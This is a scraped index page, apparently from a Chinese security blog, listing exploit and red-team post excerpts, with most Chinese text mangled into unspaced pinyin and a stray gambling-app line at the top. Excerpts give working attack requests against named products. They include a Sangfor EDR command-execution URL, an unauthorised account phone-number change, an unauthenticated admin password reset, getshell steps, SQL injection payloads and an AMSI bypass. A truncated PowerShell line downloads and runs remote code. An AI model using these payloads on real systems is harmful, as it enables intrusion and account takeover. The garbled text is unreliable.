天博app下载链接

蓝队技巧:查找被隐藏的Windows服务项

2020-10-23 / 0 评论 / 6045 浏览 / Mrxn

zaishangpian,womenshuoguohongduijiqiao:yinzangwindowsfuwu,jintianchoukonglaigengxinxia,ruhechazhaozheileiyinzangdewindowsfuwuxiang。 shouxiankanxiaxiaoguo,shiyongpowershellyuanchengxiazaizhixingzhijiehuodeyinzangdewindowsfuwumingcheng: tongguoyuanchengxiazaizhixingwuwenjianluodichakanyinzangwindowsfuwu: powershell -c "iex (new-object net.webclient)....

红队技巧:隐藏windows服务

2020-10-16 / 0 评论 / 5866 浏览 / Mrxn

zaihoushentouceshizhong,womennadaolemubiaojiqidequanxianhou,yaoxiangbanfaweichiquanxian,baochichijiu,ng,henzhongyao,buguanshenghuohaishigongzuodouxuyaochijiu! liyongwindowsfuwulaizhiruwomendehoumenyeshiyizhongchangjiandeliyongfangshi,danshiwangwangyibanzhirudefuwuhenrongyibeiguanliyuanzairenwuguanliqikandao。ruguokeyiyinzangdehua,jiudadatigaolewomendechijiuxing,jintianjiujieshaoxiayizhongliyongpowershelllaijinxingyinzangwindowsfuwudejiqiao...

零组镜像打包下载 零组文章下载(截止到2020年3月的版本和2020年09月19日版本)

2020-10-14 / 2 评论 / 7984 浏览 / Mrxn

webanquan 74cms activemq adminer adobe coldfusion apache apache dubbo apache fusionauth apache httpd apache log4j apache ss...

fastadmin(V1.0.0.20200506_beta)前台getshell(文件上传解析)漏洞分析

2020-9-21 / 0 评论 / 6882 浏览 / Mrxn

0x1.jianjie fastadminshiyikuanjiyuthinkphphebootstrapdejisuhoutaikaifakuangjia。 butianpingtaijieshao:jinri,butianloudongxiangyingpingtaijiancedaohulianwangshangchuxianfastadminwenjianshangchuanloudong,expbeigongkai。gailoudongyuanyuwangluoxitonghuochanpindedaimakaifaguochengzhongcunzaishejihuoshixianbudangdewenti,kedaozhiwenjianshangchuanbingjiexiweikezhixingwenjian。muqianchangshangyifabuxinbanbenxiufuciloudong,bu...

深信服VPN 修改任意账户绑定手机号

2020-9-18 / 0 评论 / 5485 浏览 / Mrxn

http://lujing/por/changetelnum.csp?apiversion=1newtel=target_phone&sessreq=clusterd&username=target_username&grpid=0&sessid=0&ip=127.0.0.1 zhuyi xuyaodengluzhihoucaikeyiyueduquanwen>...

CVE-2020-1472: NetLogon特权提升漏洞(接管域控制器)

2020-9-15 / 0 评论 / 4463 浏览 / Mrxn

0x01 gengxingailan 2020nian09yue14ri,360certjiancefaxian secura gongkailezhenduigailoudongyanjiubaogaojipoc,kezaocheng quanxiantishengyingxiang。bencigengxinbiaoshigailoudongdeliyonggongjugongkai,bingkenengzaiduanshijianneichuxiangongjitaishi。 jutigengxinxiangqingkecankao: loudongyanzheng 0x02 loudongjianshu 2020nian08yue12ri, 360certjiancefaxian w...

泛微OA云桥任意文件读取漏洞

2020-9-12 / 0 评论 / 4941 浏览 / Mrxn

fanwei0adezheigeloudongliyong/wxjsapi/saveyzjfilejiekouhuoqufilepath,fanhuishujubaoneichuxianlechengxudejueduilujing,gongjizhekeyitongguofanhuineirongshibiechengxuyunxinglujingcongerxiazaishujukupeizhiwenjianweihaikejian。 1、downloadurlcanshuxiugaichengxuyaohuoquwenjiandejueduilujing,jilufanhuibaozhongdeidzhi。 2、tongguochakanwenjianjiekoufang...

天融信数据防泄漏系统越权修改管理员密码

2020-9-11 / 2 评论 / 4072 浏览 / Mrxn

wuxudengluquanxian,youyuxiugaimimachuweixiaoyanyuanmima,qie/?module=auth_user&action=mod_edit_pwd jiekouweishouquanfangwen,zaochengzhijiexiugairenyiyonghumima。:morensupermanzhanghuuidwei1。 post /?module=auth_user&action=mod_edit_pwd ...

齐治堡垒机前台远程命令执行漏洞

2020-9-11 / 0 评论 / 4474 浏览 / Mrxn

qizhibaoleijiqiantaiyuanchengminglingzhixingloudong(cnvd-2019-20835) weishouquanwuxudenglu。 1、fangwen http://10.20.10.11/listener/cluster_manage.php  :fanhui "ok". 2、fangwenruxialianjiejikegetshell,zhixingchenggonghou,shengchengphpyijuhuama 3、/var/ww...

用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入

2020-9-11 / 0 评论 / 4326 浏览 / Mrxn

yongyougrp-u8r10xingzhengshiyecaiwuguanliruanjianshiyongyougongsizhuanzhuyuguojiadianzizhengwushiye,jiyuyunjisuanjishusuotuichudexinyidaichanpin,shiwoguoxingzhengshiyecaiwulingyuzuizhuanyedezhengfucaiwuguanliruanjian。 gaixitongbeipucunzaiminglingzhixingloudong,dangyonghukeyikongzhiminglingzhixinghanshuzhongdecanshushi,jiangkezhurueyixitongminglingdaozhengchangminglingzhong,zaochengminglingzhixinggongji,loudongxijieyijixiangguanloudongpocruxia: ...

绿盟UTS综合威胁探针管理员任意登录复现

2020-9-11 / 0 评论 / 4327 浏览 / Mrxn

beijing: lvmengquanliuliangweixiefenxijiejuefanganzhenduiyuanshiliuliangjinxingcaijihejiankong,duiliuliangxinxijinxingshenduhaiyuan、cunchu、chaxunhefenxi,keyijishizhangwozhongyaoxinxixitongxiangguanwangluoanquanweixiefengxian,jishijianceloudong、bingdumuma、wangluogongjiqingkuang,jishifaxianwangluoanquanshijianxiansuo,jishitongbaoyujingzhongdawangluoanquanweixie,diaocha、fangfanhedajiwangluogongjidengeyixingwei,baozhangzhongyaoxinxixitongdewangluoanquan。 lvmengzongheweixietanzhenshebeibanbenv...

HW礼盒:深信服edr RCE,天融信dlp unauth和通达OA v11.6版本RCE

2020-8-20 / 0 评论 / 3461 浏览 / Mrxn

hwlihe,qingchashou:shenxinfuedr rce:http://ip+duankou/tool/log/c.php?strip_slashes=system&host=id jikezhixingmingling,chushangmianzhiwai,haiyourenyiwenjianduqu,yanzhengmaraoguo,haiyoujiushirce。renyiyonghudenglu:zhu:2020nian08yue18ri,fofashitongsha,banbenxiaoyu 3.2.19fofazhiwen: title="sangfor...

绕过AMSI执行powershell脚本

2020-7-2 / 3 评论 / 1979 浏览 / Mrxn

jiandandeyanshixiaconglaowainalixuelaidebypass amsi dezishi,kanxiaxiaoguotu:  yueduquanwen>>

ThinkCMF5.x以下漏洞合集

2019-10-28 / 0 评论 / 8197 浏览 / Mrxn

qiantaisqlzhuru: xuyaoputongyonghuquanxian,morenkezhuce paylaod: post /thinkcmfx/index.php?g=portal&m=article&a=edit_post http/1.1 host: localhost connection: close cookie: phpsessid=kcg5v...

ThinkCMF2.2.2前台直接getshell+任意文件包含漏洞

2019-10-24 / 0 评论 / 6224 浏览 / Mrxn

0x00 jianjie     thinkcmfshiyikuanjiyuthinkphp+mysqlkaifadekaiyuanzhongwenneirongguanlikuangjia。thinkcmftichulinghuodeyingyongjizhi,kuangjiazishentigongjichudeguanligongneng,erkaifazhekeyigenjuzishendexuqiuyiyingyongdexingshijinxingkuozhan。meigeyingyongdounengdulidewanchengzijiderenwu,yeketongguoxitongdiaoyongqitayingyongjinxingxietonggongzuo。zaizheizhongyunxingjizhixia,kaifashangchangying...

WinRAR 5.80 XML 注入漏洞和拒绝服务攻击漏洞

2019-10-23 / 0 评论 / 2748 浏览 / Mrxn

0x00beijingjieshao  winrar,shiwindowsbiaopeideyasuoruanjian,dajiadoubumosheng。0x01loudongmiaoshu  danshizuijinzheiliangtianwinrar 5.80baochulelianggeloudong,yigeshixmlzhuruloudong,yigeshijujuefuwugongjiloudong。0x02loudongfuxianpoc  diyigexmlzhuruloudong: cipoczhanshifeishouquanqingkuangxiayonghuminganwenjianshangchuan zheilidewenjianshi:c:\windows\sy...

CNVD-C-2019-48814 Weblogic wls9_async_response 反序列

2019-10-17 / 1 评论 / 4054 浏览 / Mrxn

0x1.beijing shouxian,cnvdshoululeyouzhongguominshengyinxinggufenyouxiangongsibaosongdeoracle weblogic wls9-asyncfanxuliehuayuanchengminglingzhixingloudong(cnvd-c-2019-48814)。 0x2.loudongmiaoshu gongjizheliyonggailoudong,kezaiweishouquandeqingkuangxiayuanchengzhixingmingling。congxiangguanxinxilaikan。 bufenbanbenweblogiczhongmorenbaohandewls9_async_responsebao,weiwe...

CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC

2019-10-16 / 0 评论 / 1784 浏览 / Mrxn

0x1 jiandanjieshao: x server shijuedaduishulinuxfaxingbanheunixxitongdejichutuxingjiemianchengxu,shixitongbiaopei。ercichengxuyeshiyirootquanxianqidongde,yinerchenggongyichutaerhuodedeshell,yeshirootquanxian。 0x2 loudongxiangguanxinxi # shijian: 2019-10-16 # zuozhe: marcelo vázquez (s4vitar) # changshang: http...

从朋友圈XX中奖getshell到提权服务器过程简单记录

2019-10-13 / 2 评论 / 2772 浏览 / Mrxn

zhuyi:suoyoudeguochengjingongshentouxuexiyanjiucankao,jinzhiyongyutatu。 jianyixuexishentoudepengyousousuoyixiefeifawangzhandeguanjiancilaijinxingshizhanlianxi!ganbaotamen! 0x1 beijing: zaipengyouquanfaxianxiaoyizhuanfaleyipianxxxzhongjiang,dakaiyikaishixxcaipiao,qishijiushibocaidepi,guoduanxianquanxiaoyishandiaozheitiaopengyouquan,jiuyoulexiamianzheipianwenzhang: 0x2 xinxisouji: faxianmubiaoxitongshidedecms,qieweiwindowsxi...

某站禁用各种函数情况下的 Thinkphp5.x 绕过 Getshell

2019-6-11 / 3 评论 / 8415 浏览 / Mrxn

thinkphp dezhan,qiecunzai thinkphp 5.0.x yuanchengminglingzhixingloudong,bingqiekaile debug moshi,danshi⽬biaoyongdeshithinkphp5.0.20,⼀kaishi⽤wangluoshangde poc dazenmedoubuchenggong。 diyigewentishi,mubiao php jin⽤leminglingzhixingdehanshu,biruzhixing system tishi disabled: buguokanqilaiwenjianhanshumeiyoujinyong,⽐ru file_g...

分分钟干死你的WordPress网站或者任意网站

2018-3-2 / 8 评论 / 3022 浏览 / Mrxn

jintiandaochuguangbokekandaoyigexin(jiu)wen:wordpress4.9.2(han)yiqiandewangzhanhanyoudosloudong,keyiyongyitaidiannaoqingsongdowndiaowangzhan。laiyuanlianjie; cve;poc (zheigepoczhishihepython2.7+,python3,bingbushihe,wozuolexiugaishiqinengzaipython3shangzhixing,dizhi:http://github.com/mr-xn/cve-2018-63...

1 2 3